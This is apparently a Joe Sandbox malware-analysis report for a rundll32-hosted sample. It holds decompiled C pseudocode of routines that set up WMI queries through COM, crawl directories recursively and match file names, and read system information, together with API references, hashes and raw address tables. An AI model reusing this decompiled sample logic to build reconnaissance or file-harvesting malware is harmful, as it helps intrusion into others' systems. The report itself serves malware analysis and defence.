                                                                      • Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 459ceca762080cf357c362edab4f1ee4805586002f586a962786011784d06284
                                                                      • Instruction ID: b10770db1e9388dcee0aa395ba77e9f53165220c315ddfd99952fd0b0b8f4329
                                                                      • Opcode Fuzzy Hash: 459ceca762080cf357c362edab4f1ee4805586002f586a962786011784d06284
                                                                      • Instruction Fuzzy Hash: 12D01270E0434CFFDB448ED08A847ED7D75EB04309F104414A14666143F7341F81A740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 30%
                                                                      			E0494D213(void* __ecx) {
                                                                      				char _v8;
                                                                      				void* _v12;
                                                                      				char* _t15;
                                                                      				intOrPtr* _t16;
                                                                      				void* _t21;
                                                                      				intOrPtr* _t23;
                                                                      				intOrPtr* _t24;
                                                                      				intOrPtr* _t25;
                                                                      				void* _t30;
                                                                      				void* _t33;
                                                                      
                                                                      				_v12 = 0;
                                                                      				_v8 = 0;
                                                                      				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                      				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                      				_t15 =  &_v12;
                                                                      				__imp__CoCreateInstance(0x495d848, 0, 1, 0x495d858, _t15);
                                                                      				if(_t15 < 0) {
                                                                      					L5:
                                                                      					_t23 = _v8;
                                                                      					if(_t23 != 0) {
                                                                      						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                      					}
                                                                      					_t24 = _v12;
                                                                      					if(_t24 != 0) {
                                                                      						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                      					}
                                                                      					_t16 = 0;
                                                                      				} else {
                                                                      					__imp__#2(__ecx);
                                                                      					_t25 = _v12;
                                                                      					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                      					if(_t21 < 0) {
                                                                      						goto L5;
                                                                      					} else {
                                                                      						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                      						if(_t21 < 0) {
                                                                      							goto L5;
                                                                      						} else {
                                                                      							_t16 = E0494911F(8);
                                                                      							if(_t16 == 0) {
                                                                      								goto L5;
                                                                      							} else {
                                                                      								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                      								 *_t16 = _v8;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t16;
                                                                      			}














                                                                      APIs
                                                                      • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D226
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D237
                                                                      • CoCreateInstance.OLE32(0495D848,00000000,00000001,0495D858,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D24E
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0494D259
                                                                      • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D284
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
                                                                      • String ID:
                                                                      • API String ID: 3531828250-0
                                                                      • Opcode ID: 6737490ee26a49ccf70a8dfe6a4a3d293c11202c85fcf5028d32e8e879f2990b
                                                                      • Instruction ID: 68b4462bd7dd5207824738070bc75741ea5d0350ccc736624b7bca122d36915d
                                                                      • Opcode Fuzzy Hash: 6737490ee26a49ccf70a8dfe6a4a3d293c11202c85fcf5028d32e8e879f2990b
                                                                      • Instruction Fuzzy Hash: 64210974600245BFEB249BA6DC5DE6BBF7CEFC6B15F10426CF501A7290D674AA00CA30
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 78%
                                                                      			E04949DA8(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                      				char _v12;
                                                                      				WCHAR* _v16;
                                                                      				struct _WIN32_FIND_DATAW _v608;
                                                                      				WCHAR* _t24;
                                                                      				intOrPtr _t31;
                                                                      				intOrPtr _t41;
                                                                      				void* _t45;
                                                                      				intOrPtr _t46;
                                                                      				void* _t48;
                                                                      				intOrPtr _t54;
                                                                      				void* _t59;
                                                                      				char _t60;
                                                                      				void* _t61;
                                                                      				void* _t62;
                                                                      				void* _t63;
                                                                      				void* _t75;
                                                                      
                                                                      				_t75 = __fp0;
                                                                      				_push(0);
                                                                      				_t48 = __ecx;
                                                                      				_push(L"\\*");
                                                                      				_t24 = E04949924(__ecx);
                                                                      				_t63 = _t62 + 0xc;
                                                                      				_v16 = _t24;
                                                                      				if(_t24 == 0) {
                                                                      					return _t24;
                                                                      				}
                                                                      				_t59 = FindFirstFileW(_t24,  &_v608);
                                                                      				if(_t59 == 0xffffffff) {
                                                                      					L14:
                                                                      					return E0494913B( &_v16, 0xfffffffe);
                                                                      				} else {
                                                                      					goto L2;
                                                                      				}
                                                                      				do {
                                                                      					L2:
                                                                      					if(E04949D80( &(_v608.cFileName)) != 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                      						L10:
                                                                      						_push(0);
                                                                      						_push( &(_v608.cFileName));
                                                                      						_push("\\");
                                                                      						_t60 = E04949924(_t48);
                                                                      						_t63 = _t63 + 0x10;
                                                                      						_v12 = _t60;
                                                                      						if(_t60 != 0) {
                                                                      							_t54 =  *0x4960fa0; // 0x49ff8a0
                                                                      							 *((intOrPtr*)(_t54 + 0xc4))(1);
                                                                      							_push(1);
                                                                      							_push(1);
                                                                      							_push(0);
                                                                      							E04949DA8(_t60, _t75, 1, 5, E04950A46, _a16);
                                                                      							_t63 = _t63 + 0x1c;
                                                                      							E0494913B( &_v12, 0xfffffffe);
                                                                      						}
                                                                      						goto L12;
                                                                      					}
                                                                      					_t61 = 0;
                                                                      					do {
                                                                      						_push( *((intOrPtr*)(_t61 + 0x49610cc)));
                                                                      						_push( &(_v608.cFileName));
                                                                      						_t41 =  *0x4960fe0; // 0x49ffbe0
                                                                      						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
                                                                      							goto L8;
                                                                      						}
                                                                      						_t45 = E04950A46(_t75, _t48,  &_v608, _a16);
                                                                      						_t63 = _t63 + 0xc;
                                                                      						if(_t45 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t46 =  *0x4960fa0; // 0x49ff8a0
                                                                      						 *((intOrPtr*)(_t46 + 0xc4))(1);
                                                                      						L8:
                                                                      						_t61 = _t61 + 4;
                                                                      					} while (_t61 < 4);
                                                                      					if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                      						goto L12;
                                                                      					}
                                                                      					goto L10;
                                                                      					L12:
                                                                      				} while (FindNextFileW(_t59,  &_v608) != 0);
                                                                      				_t31 =  *0x4960fa0; // 0x49ff8a0
                                                                      				 *((intOrPtr*)(_t31 + 0x84))(_t59);
                                                                      				goto L14;
                                                                      			}




















                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 04949DD9
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 04949EBC
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$FirstNext
                                                                      • String ID:
                                                                      • API String ID: 1690352074-0
                                                                      • Opcode ID: 5541696d79f63d508449c09cd331c1883ee1c15fbb20ab08347d10db39ff988d
                                                                      • Instruction ID: 13550f322ba5ac10fe3c24484d6a48b9fa10f09c52fa586142839f0441116417
                                                                      • Opcode Fuzzy Hash: 5541696d79f63d508449c09cd331c1883ee1c15fbb20ab08347d10db39ff988d
                                                                      • Instruction Fuzzy Hash: 073184B1A40215AFEB20DA74DC8DFAB37ACEB84714F140179FA09A61C1E675AA418B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,04941CDE,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0494C2DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystem
                                                                      • String ID:
                                                                      • API String ID: 2086374402-0
                                                                      • Opcode ID: d245bfd6c313fffcb8e21e10a33fe823edbc8da8202e0278154c7cf161017beb
                                                                      • Instruction ID: 04bbc7248e48568ff5c143e033daef9b20f84cab5d13a664b92d1d604f8db341
                                                                      • Opcode Fuzzy Hash: d245bfd6c313fffcb8e21e10a33fe823edbc8da8202e0278154c7cf161017beb
                                                                      • Instruction Fuzzy Hash: 12E04FB6901314AFD720EE78DD05FAEBBBCEBC0B14F114664AC45B7348E670AE088794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0494B883(void* __ecx) {
                                                                      				struct _SYSTEM_INFO _v40;
                                                                      				void* _t5;
                                                                      
                                                                      				if(__ecx == 0) {
                                                                      					GetSystemInfo( &_v40);
                                                                      					return _v40.dwOemId & 0x0000ffff;
                                                                      				} else {
                                                                      					_t5 = 9;
                                                                      					return _t5;
                                                                      				}
                                                                      			}






                                                                      APIs
                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0494BD6E,?,?,00000000), ref: 0494B896
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true
                                                                      • Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystem
                                                                      • String ID:
                                                                      • API String ID: 31276548-0
                                                                      • Opcode ID: 7d83ecb3f3fa960408e7790c1965889c0e0e8622669d436b668059333b479601
                                                                      • Instruction ID: 1c315330aa96b9c6a1dd77b55bb44dc8d7ca268ea841c940b81e99581c476a7a
                                                                      • Opcode Fuzzy Hash: 7d83ecb3f3fa960408e7790c1965889c0e0e8622669d436b668059333b479601
                                                                      • Instruction Fuzzy Hash: D4C0126160430D56CF449BA5A616AAE76EC5B44609F2001B5EA06F1081E655ED414361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E0494D6E7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				void* _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _v44;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				intOrPtr _v56;
                                                                      				signed int _v60;
                                                                      				char* _v72;
                                                                      				signed short _v80;
                                                                      				signed int _v84;
                                                                      				char _v88;
                                                                      				char _v92;
                                                                      				char _v96;
                                                                      				intOrPtr _v100;
                                                                      				char _v104;
                                                                      				char _v616;
                                                                      				intOrPtr* _t159;
                                                                      				char _t165;
                                                                      				signed int _t166;
                                                                      				signed int _t173;
                                                                      				signed int _t178;
                                                                      				signed int _t186;
                                                                      				intOrPtr* _t187;
                                                                      				signed int _t188;
                                                                      				signed int _t192;
                                                                      				intOrPtr* _t193;
                                                                      				intOrPtr _t200;
                                                                      				intOrPtr* _t205;
                                                                      				signed int _t207;
                                                                      				signed int _t209;
                                                                      				intOrPtr* _t210;
                                                                      				intOrPtr _t212;
                                                                      				intOrPtr* _t213;
                                                                      				signed int _t214;
                                                                      				char _t217;
                                                                      				signed int _t218;
                                                                      				signed int _t219;
                                                                      				signed int _t230;
                                                                      				signed int _t235;
                                                                      				signed int _t242;
                                                                      				signed int _t243;
                                                                      				signed int _t244;
                                                                      				signed int _t245;
                                                                      				intOrPtr* _t247;
                                                                      				intOrPtr* _t251;
                                                                      				signed int _t252;
                                                                      				intOrPtr* _t253;
                                                                      				void* _t255;
                                                                      				intOrPtr* _t261;
                                                                      				signed int _t262;
                                                                      				signed int _t283;
                                                                      				signed int _t289;
                                                                      				char* _t298;
                                                                      				void* _t320;
                                                                      				signed int _t322;
                                                                      				intOrPtr* _t323;
                                                                      				intOrPtr _t324;
                                                                      				signed int _t327;
                                                                      				intOrPtr* _t328;
                                                                      				intOrPtr* _t329;
                                                                      
                                                                      				_v32 = _v32 & 0x00000000;
                                                                      				_v60 = _v60 & 0x00000000;
                                                                      				_v56 = __edx;
                                                                      				_v100 = __ecx;
                                                                      				_t159 = E0494D213(__ecx);
                                                                      				_t251 = _t159;
                                                                      				_v104 = _t251;
                                                                      				if(_t251 == 0) {
                                                                      					return _t159;
                                                                      				}
                                                                      				_t320 = E0494911F(0x10);
                                                                      				_v36 = _t320;
                                                                      				_pop(_t255);
                                                                      				if(_t320 == 0) {
                                                                      					L53:
                                                                      					E0494913B( &_v60, 0xfffffffe);
                                                                      					E0494D2C7( &_v104);
                                                                      					return _t320;
                                                                      				}
                                                                      				_t165 = E049490EA(_t255, 0x101c);
                                                                      				 *_t328 = 0xa18;
                                                                      				_v52 = _t165;
                                                                      				_t166 = E049490EA(_t255);
                                                                      				_push(0);
                                                                      				_push(_v56);
                                                                      				_v20 = _t166;
                                                                      				_push(_t166);
                                                                      				_push(_a4);
                                                                      				_t322 = E04949924(_t165);
                                                                      				_v60 = _t322;
                                                                      				E04949D66( &_v52);
                                                                      				E04949D66( &_v20);
                                                                      				_t329 = _t328 + 0x20;
                                                                      				if(_t322 != 0) {
                                                                      					_t323 = __imp__#2;
                                                                      					_v40 =  *_t323(_t322);
                                                                      					_t173 = E049490EA(_t255, 0x10b4);
                                                                      					_v20 = _t173;
                                                                      					_v52 =  *_t323(_t173);
                                                                      					E04949D66( &_v20);
                                                                      					_t324 = _v40;
                                                                      					_t261 =  *_t251;
                                                                      					_t252 = 0;
                                                                      					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                      					__eflags = _t178;
                                                                      					if(_t178 != 0) {
                                                                      						L52:
                                                                      						__imp__#6(_t324);
                                                                      						__imp__#6(_v52);
                                                                      						goto L53;
                                                                      					}
                                                                      					_t262 = _v32;
                                                                      					_v28 = 0;
                                                                      					_v20 = 0;
                                                                      					__eflags = _t262;
                                                                      					if(_t262 == 0) {
                                                                      						L49:
                                                                      						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                      						__eflags = _t252;
                                                                      						if(_t252 == 0) {
                                                                      							E0494913B( &_v36, 0);
                                                                      							_t320 = _v36;
                                                                      						} else {
                                                                      							 *(_t320 + 8) = _t252;
                                                                      							 *_t320 = E04949787(_v100);
                                                                      							 *((intOrPtr*)(_t320 + 4)) = E04949787(_v56);
                                                                      						}
                                                                      						goto L52;
                                                                      					} else {
                                                                      						goto L6;
                                                                      					}
                                                                      					while(1) {
                                                                      						L6:
                                                                      						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                      						__eflags = _t186;
                                                                      						if(_t186 != 0) {
                                                                      							break;
                                                                      						}
                                                                      						_v16 = 0;
                                                                      						_v48 = 0;
                                                                      						_v12 = 0;
                                                                      						_v24 = 0;
                                                                      						__eflags = _v84;
                                                                      						if(_v84 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t187 = _v28;
                                                                      						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                      						__eflags = _t188;
                                                                      						if(_t188 >= 0) {
                                                                      							__imp__#20(_v24, 1,  &_v16);
                                                                      							__imp__#19(_v24, 1,  &_v48);
                                                                      							_t46 = _t320 + 0xc; // 0xc
                                                                      							_t253 = _t46;
                                                                      							_t327 = _t252 << 3;
                                                                      							_t47 = _t327 + 8; // 0x8
                                                                      							_t192 = E049491B9(_t327, _t47);
                                                                      							__eflags = _t192;
                                                                      							if(_t192 == 0) {
                                                                      								__imp__#16(_v24);
                                                                      								_t193 = _v28;
                                                                      								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                      								L46:
                                                                      								_t252 = _v20;
                                                                      								break;
                                                                      							}
                                                                      							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                      							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E0494911F( *(_t327 +  *_t253) << 3);
                                                                      							_t200 =  *_t253;
                                                                      							__eflags =  *(_t327 + _t200 + 4);
                                                                      							if( *(_t327 + _t200 + 4) == 0) {
                                                                      								_t136 = _t320 + 0xc; // 0xc
                                                                      								E0494913B(_t136, 0);
                                                                      								E0494913B( &_v36, 0);
                                                                      								__imp__#16(_v24);
                                                                      								_t205 = _v28;
                                                                      								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                      								_t320 = _v36;
                                                                      								goto L46;
                                                                      							}
                                                                      							_t207 = _v16;
                                                                      							while(1) {
                                                                      								_v12 = _t207;
                                                                      								__eflags = _t207 - _v48;
                                                                      								if(_t207 > _v48) {
                                                                      									break;
                                                                      								}
                                                                      								_v44 = _v44 & 0x00000000;
                                                                      								_t209 =  &_v12;
                                                                      								__imp__#25(_v24, _t209,  &_v44);
                                                                      								__eflags = _t209;
                                                                      								if(_t209 < 0) {
                                                                      									break;
                                                                      								}
                                                                      								_t212 = E04949787(_v44);
                                                                      								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                      								_t213 = _v28;
                                                                      								_t281 =  *_t213;
                                                                      								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                      								__eflags = _t214;
                                                                      								if(_t214 < 0) {
                                                                      									L39:
                                                                      									__imp__#6(_v44);
                                                                      									_t207 = _v12 + 1;
                                                                      									__eflags = _t207;
                                                                      									continue;
                                                                      								}
                                                                      								_v92 = E049490EA(_t281, 0xe23);
                                                                      								 *_t329 = 0x375;
                                                                      								_t217 = E049490EA(_t281);
                                                                      								_t283 = _v80;
                                                                      								_v96 = _t217;
                                                                      								_t218 = _t283 & 0x0000ffff;
                                                                      								__eflags = _t218 - 0xb;
                                                                      								if(__eflags > 0) {
                                                                      									_t219 = _t218 - 0x10;
                                                                      									__eflags = _t219;
                                                                      									if(_t219 == 0) {
                                                                      										L35:
                                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E0494911F(0x18);
                                                                      										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                      										__eflags = _t289;
                                                                      										if(_t289 == 0) {
                                                                      											L38:
                                                                      											E04949D66( &_v92);
                                                                      											E04949D66( &_v96);
                                                                      											__imp__#9( &_v80);
                                                                      											goto L39;
                                                                      										}
                                                                      										_push(_v72);
                                                                      										_push(L"%d");
                                                                      										L37:
                                                                      										_push(0xc);
                                                                      										_push(_t289);
                                                                      										E0494C08E();
                                                                      										_t329 = _t329 + 0x10;
                                                                      										goto L38;
                                                                      									}
                                                                      									_t230 = _t219 - 1;
                                                                      									__eflags = _t230;
                                                                      									if(_t230 == 0) {
                                                                      										L33:
                                                                      										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E0494911F(0x18);
                                                                      										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                      										__eflags = _t289;
                                                                      										if(_t289 == 0) {
                                                                      											goto L38;
                                                                      										}
                                                                      										_push(_v72);
                                                                      										_push(L"%u");
                                                                      										goto L37;
                                                                      									}
                                                                      									_t235 = _t230 - 1;
                                                                      									__eflags = _t235;
                                                                      									if(_t235 == 0) {
                                                                      										goto L33;
                                                                      									}
                                                                      									__eflags = _t235 == 1;
                                                                      									if(_t235 == 1) {
                                                                      										goto L33;
                                                                      									}
                                                                      									L28:
                                                                      									__eflags = _t283 & 0x00002000;
                                                                      									if((_t283 & 0x00002000) == 0) {
                                                                      										_v88 = E049490EA(_t283, 0xedb);
                                                                      										E0494C08E( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                      										E04949D66( &_v88);
                                                                      										_t329 = _t329 + 0x18;
                                                                      										_t298 =  &_v616;
                                                                      										L31:
                                                                      										_t242 = E04949787(_t298);
                                                                      										L32:
                                                                      										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                      										goto L38;
                                                                      									}
                                                                      									_t242 = E0494D5CB( &_v80);
                                                                      									goto L32;
                                                                      								}
                                                                      								if(__eflags == 0) {
                                                                      									__eflags = _v72 - 0xffff;
                                                                      									_t298 = L"TRUE";
                                                                      									if(_v72 != 0xffff) {
                                                                      										_t298 = L"FALSE";
                                                                      									}
                                                                      									goto L31;
                                                                      								}
                                                                      								_t243 = _t218 - 1;
                                                                      								__eflags = _t243;
                                                                      								if(_t243 == 0) {
                                                                      									goto L38;
                                                                      								}
                                                                      								_t244 = _t243 - 1;
                                                                      								__eflags = _t244;
                                                                      								if(_t244 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								_t245 = _t244 - 1;
                                                                      								__eflags = _t245;
                                                                      								if(_t245 == 0) {
                                                                      									goto L35;
                                                                      								}
                                                                      								__eflags = _t245 != 5;
                                                                      								if(_t245 != 5) {
                                                                      									goto L28;
                                                                      								}
                                                                      								_t298 = _v72;
                                                                      								goto L31;
                                                                      							}
                                                                      							__imp__#16(_v24);
                                                                      							_t210 = _v28;
                                                                      							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                      							_t252 = _v20;
                                                                      							L42:
                                                                      							_t262 = _v32;
                                                                      							_t252 = _t252 + 1;
                                                                      							_v20 = _t252;
                                                                      							__eflags = _t262;
                                                                      							if(_t262 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							L48:
                                                                      							_t324 = _v40;
                                                                      							goto L49;
                                                                      						}
                                                                      						_t247 = _v28;
                                                                      						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                      						goto L42;
                                                                      					}
                                                                      					_t262 = _v32;
                                                                      					goto L48;
                                                                      				} else {
                                                                      					E0494913B( &_v36, _t322);
                                                                      					_t320 = _v36;
                                                                      					goto L53;
                                                                      				}
                                                                      			}
                                                                      0x0494d808
                                                                      0x0494d80b
                                                                      0x0494d80e
                                                                      0x0494d811
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d817
                                                                      0x0494d825
                                                                      0x0494d828
                                                                      0x0494d82a
                                                                      0x0494d843
                                                                      0x0494d852
                                                                      0x0494d85a
                                                                      0x0494d85a
                                                                      0x0494d85d
                                                                      0x0494d864
                                                                      0x0494d868
                                                                      0x0494d86e
                                                                      0x0494d870
                                                                      0x0494dae0
                                                                      0x0494dae6
                                                                      0x0494daec
                                                                      0x0494daef
                                                                      0x0494daef
                                                                      0x00000000
                                                                      0x0494daef
                                                                      0x0494d87f
                                                                      0x0494d893
                                                                      0x0494d897
                                                                      0x0494d899
                                                                      0x0494d89e
                                                                      0x0494daad
                                                                      0x0494dab3
                                                                      0x0494dabe
                                                                      0x0494dac9
                                                                      0x0494dacf
                                                                      0x0494dad5
                                                                      0x0494dad8
                                                                      0x00000000
                                                                      0x0494dad8
                                                                      0x0494d8a4
                                                                      0x0494da7b
                                                                      0x0494da7b
                                                                      0x0494da7e
                                                                      0x0494da81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d8ac
                                                                      0x0494d8b4
                                                                      0x0494d8bb
                                                                      0x0494d8c1
                                                                      0x0494d8c3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d8cc
                                                                      0x0494d8e1
                                                                      0x0494d8e7
                                                                      0x0494d8f0
                                                                      0x0494d8f3
                                                                      0x0494d8f6
                                                                      0x0494d8f8
                                                                      0x0494da6e
                                                                      0x0494da71
                                                                      0x0494da7a
                                                                      0x0494da7a
                                                                      0x00000000
                                                                      0x0494da7a
                                                                      0x0494d908
                                                                      0x0494d90b
                                                                      0x0494d912
                                                                      0x0494d918
                                                                      0x0494d91b
                                                                      0x0494d91e
                                                                      0x0494d921
                                                                      0x0494d924
                                                                      0x0494d960
                                                                      0x0494d960
                                                                      0x0494d963
                                                                      0x0494da0f
                                                                      0x0494da23
                                                                      0x0494da33
                                                                      0x0494da37
                                                                      0x0494da39
                                                                      0x0494da50
                                                                      0x0494da54
                                                                      0x0494da5d
                                                                      0x0494da68
                                                                      0x00000000
                                                                      0x0494da68
                                                                      0x0494da3f
                                                                      0x0494da40
                                                                      0x0494da45
                                                                      0x0494da45
                                                                      0x0494da47
                                                                      0x0494da48
                                                                      0x0494da4d
                                                                      0x00000000
                                                                      0x0494da4d
                                                                      0x0494d969
                                                                      0x0494d969
                                                                      0x0494d96c
                                                                      0x0494d9d7
                                                                      0x0494d9eb
                                                                      0x0494d9fb
                                                                      0x0494d9ff
                                                                      0x0494da01
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494da07
                                                                      0x0494da08
                                                                      0x00000000
                                                                      0x0494da08
                                                                      0x0494d96e
                                                                      0x0494d96e
                                                                      0x0494d971
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d973
                                                                      0x0494d976
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d978
                                                                      0x0494d978
                                                                      0x0494d97e
                                                                      0x0494d99a
                                                                      0x0494d9a9
                                                                      0x0494d9b2
                                                                      0x0494d9b7
                                                                      0x0494d9ba
                                                                      0x0494d9c0
                                                                      0x0494d9c0
                                                                      0x0494d9c5
                                                                      0x0494d9d1
                                                                      0x00000000
                                                                      0x0494d9d1
                                                                      0x0494d983
                                                                      0x00000000
                                                                      0x0494d983
                                                                      0x0494d926
                                                                      0x0494d94d
                                                                      0x0494d952
                                                                      0x0494d957
                                                                      0x0494d959
                                                                      0x0494d959
                                                                      0x00000000
                                                                      0x0494d957
                                                                      0x0494d928
                                                                      0x0494d928
                                                                      0x0494d92b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d931
                                                                      0x0494d931
                                                                      0x0494d934
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d93a
                                                                      0x0494d93a
                                                                      0x0494d93d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d943
                                                                      0x0494d946
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494d948
                                                                      0x00000000
                                                                      0x0494d948
                                                                      0x0494da8a
                                                                      0x0494da90
                                                                      0x0494da96
                                                                      0x0494da99
                                                                      0x0494da9c
                                                                      0x0494da9c
                                                                      0x0494da9f
                                                                      0x0494daa0
                                                                      0x0494daa3
                                                                      0x0494daa5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0494daf5
                                                                      0x0494daf5
                                                                      0x00000000
                                                                      0x0494daf5
                                                                      0x0494d82c
